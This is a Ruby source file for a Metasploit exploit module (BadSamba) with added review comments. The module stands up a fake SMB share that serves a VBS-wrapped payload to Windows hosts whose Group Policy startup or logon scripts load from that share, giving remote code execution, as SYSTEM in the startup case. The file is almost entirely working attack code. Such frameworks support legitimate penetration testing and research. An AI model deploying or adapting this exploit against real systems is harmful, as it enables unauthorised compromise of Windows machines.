##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
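class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::SMB::Server::Share

  # Module metadata. The module stands up a fake SMB share (via the Share
  # mixin) that hands a VBS-wrapped payload to any host whose Group Policy
  # startup/logon script points at this share's UNC path. Redirecting the
  # target's traffic to the share is out of scope and is left to the operator.
  #
  # @param info [Hash] module info, merged by Msf::Module#update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Group Policy Script Execution From Shared Resource',
        'Description' => %q{
          This is a general-purpose module for exploiting systems with Windows Group Policy
          configured to load VBS startup/logon scripts from remote locations. This module runs
          a SMB shared resource that will provide a payload through a VBS file. Startup scripts
          will be executed with SYSTEM privileges, while logon scripts will be executed with the
          user privileges. Have into account which the attacker still needs to redirect the
          target traffic to the fake SMB share to exploit it successfully. Please note in some
          cases, it will take 5 to 10 minutes to receive a session.
        },
        'Author' => [
          'Sam Bertram <sbertram[at]gdssecurity.com>', # BadSamba
          'juan vazquez' # msf module
        ],
        'References' => [
          ['URL', 'http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html'],
          ['URL', 'https://github.com/GDSSecurity/BadSamba']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        # Kept false: the description says logon scripts run as the logged-on
        # user, so a privileged (SYSTEM) session is only obtained in the
        # startup-script case and cannot be promised in general.
        'Privileged' => false,
        'Platform' => 'win',
        'Payload' => {
          # NOTE(review): 2048 bytes is the declared payload budget; the exe
          # is converted to VBS below, so the real limit is presumably what
          # to_exe_vbs can embed — confirm before raising it.
          'Space' => 2048,
          'DisableNops' => true
        },
        'Targets' => [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2015-01-26',
        'Notes' => {
          'AKA' => ['badsamba'],
          'Stability' => UNKNOWN_STABILITY,
          'Reliability' => UNKNOWN_RELIABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILE_NAME', [ false, 'VBS File name to share (Default: random .vbs)'])
      ]
    )

    # File contents are generated per client in on_client_connect, so the
    # mixin's static FILE_CONTENTS option is not meaningful here.
    deregister_options('FILE_CONTENTS')
  end

  # Picks the shared file name and resets the per-client payload cache.
  #
  # An unset or empty FILE_NAME (OptString is not required, so "" is
  # possible) falls back to a random 4-6 letter name with a .vbs extension;
  # the original only handled nil and would have shared a file named "".
  #
  # @return [void]
  def setup
    super
    requested = datastore['FILE_NAME'].to_s
    self.file_name = requested.empty? ? "#{Rex::Text.rand_text_alpha(rand(4..6))}.vbs" : requested
    @custom_payloads = {}
    print_status("File available on #{unc}...")
  end

  # Builds the VBS dropper for a connecting client the first time that
  # client object is seen, keyed by the client so get_file_contents can
  # return it.
  #
  # Bug fixed here: the original tested the literal symbol `:client`
  # instead of the `client` argument, so the cache lookup never hit and a
  # fresh payload was regenerated on every connection.
  #
  # NOTE(review): nothing in this block restricts which peers receive the
  # payload — every connecting client gets one. The cache is also never
  # pruned; entries live as long as the module instance.
  #
  # @param client [Object] connection object handed in by the Share mixin
  # @return [void]
  def on_client_connect(client)
    super(client)

    return if @custom_payloads[client]

    p = regenerate_payload(client)
    if p.nil?
      # NOTE(review): treating a nil return as "generation failed", as other
      # server-mixin modules do — confirm against regenerate_payload. Leaving
      # the cache empty makes get_file_contents fall back to the mixin default
      # instead of raising NoMethodError on p.encoded_exe.
      print_error('Failed to generate payload')
      return
    end

    @custom_payloads[client] = Msf::Util::EXE.to_exe_vbs(p.encoded_exe)
  end

  # Returns the client-specific VBS payload, or the Share mixin's default
  # contents when none was generated for this client.
  #
  # @param client [Object] connection requesting the shared file
  # @return [String] bytes to serve over SMB
  def get_file_contents(client:)
    @custom_payloads[client] || super(client: client)
  end
end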